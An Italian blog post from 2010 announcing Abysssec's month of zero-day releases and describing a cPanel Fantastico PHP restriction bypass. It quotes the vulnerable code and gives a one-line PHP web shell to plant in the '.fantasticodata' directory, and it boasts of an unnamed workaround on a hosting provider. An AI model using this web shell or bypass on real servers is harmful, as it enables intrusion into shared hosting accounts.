[MOAUB]Oday on Exploit-DB(Cpanel
E parte finalmente questo fantastico progetto:
The Abysssec Security Team is about to unleash its Month Of Abysssec Undisclosed Bugs on us. Abysssec will release a collection of 0days, web application vulnerabilities, and detailed binary analysis (and pocs) for recently released advisories by vendors such as Microsoft, Mozilla, Sun, Apple, Adobe, HP, Novel, etc. The 0day collection includes PoCs and Exploits for Microsoft Excel, Internet Explorer, Microsoft codecs, Cpanel and others. The MOAUB will be hosted on the Exploit Database, and will be updated on a daily basis. Get your hard-hats on, your VM’s and debugging tools organized – it’s gonna be a an intensive ride. Follow both the exploit-db and Abysssec twitter feed to keep updated!
Ed ecco gli oday di settembre by Abysssec:
Title : Cpanel PHP Restriction Bypass Vulnerability
Version : <= 11.25
Discovery : http://www.abysssec.com
Vendor : http://www.cpanel.net
Impact : Ciritical
Contact : shahin [at] abysssec.com , info [at] abysssec.com
Twitter : @abysssec
Attackers can use this issue to gain access to restricted files, potentially obtaining sensitive information that may aid in further attacks.It can help attacker to bypass restriction such as mod_security , Safemod and disable functions.
Questo oday, sfrutta una vulnerabilità nella pagina php:
/usr/local/cpanel/3rdparty/fantastico/autoinstallhome.php
Linea 259:
$Directory = $Home_Directory . '.fantasticodata/' . $Script . '/' ;
$Files = Get_Files ( $Directory ) ;
Come si vede lo script esegui tutti i file, contenuti nella directory .fantasticodata/script_richiesto.
Quindi, basta aggiungere dei file nostri per eseguirli senza restrizioni, ad esempio:
<?php system($_GET'cmd']) ?>
I file vengono eseguiti:
Now your PHP code will execute without /safe_mode/Disable_function/ Mod_security due to cpanel php.ini must be run with execute permission.
Su netsons, non è exploitable questa vulnerabilità :( ma comunque sfruttando popen si può girare lo stesso nel server :D però sss segreto :D
Comunque ecco il POC originale:
L'altro oday pubblicato sempre da Abysssec riguarda la CVE-2010-1297
Causa:
Attackers can exploit this issue to execute arbitrary code or cause denial-of-service conditions.
:D buon divertimento ;)
Related posts:
- [guida]Oday-Exploit Adobe Reader: Hack di Windows con metasploit
- KiTrap0D Virtual-DOS oday per metasploit :)
- [EXPLOIT]Windows Help Centre Remote code Excution
- IE 6/7 EXPLOIT XML Remote Code Execution with METASPLOIT
- [CVE-2010-2568]Metasploit:windows Oday Remote Code Exuction
This entry was posted on Wednesday, September 1st, 2010 at 1:05 pm and is filed under Hacking. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.
Tagged with: exploit • flash • metasploit • oday • remote
Pingback: [MOAUB]Oday on Exploit-DB(Cpanel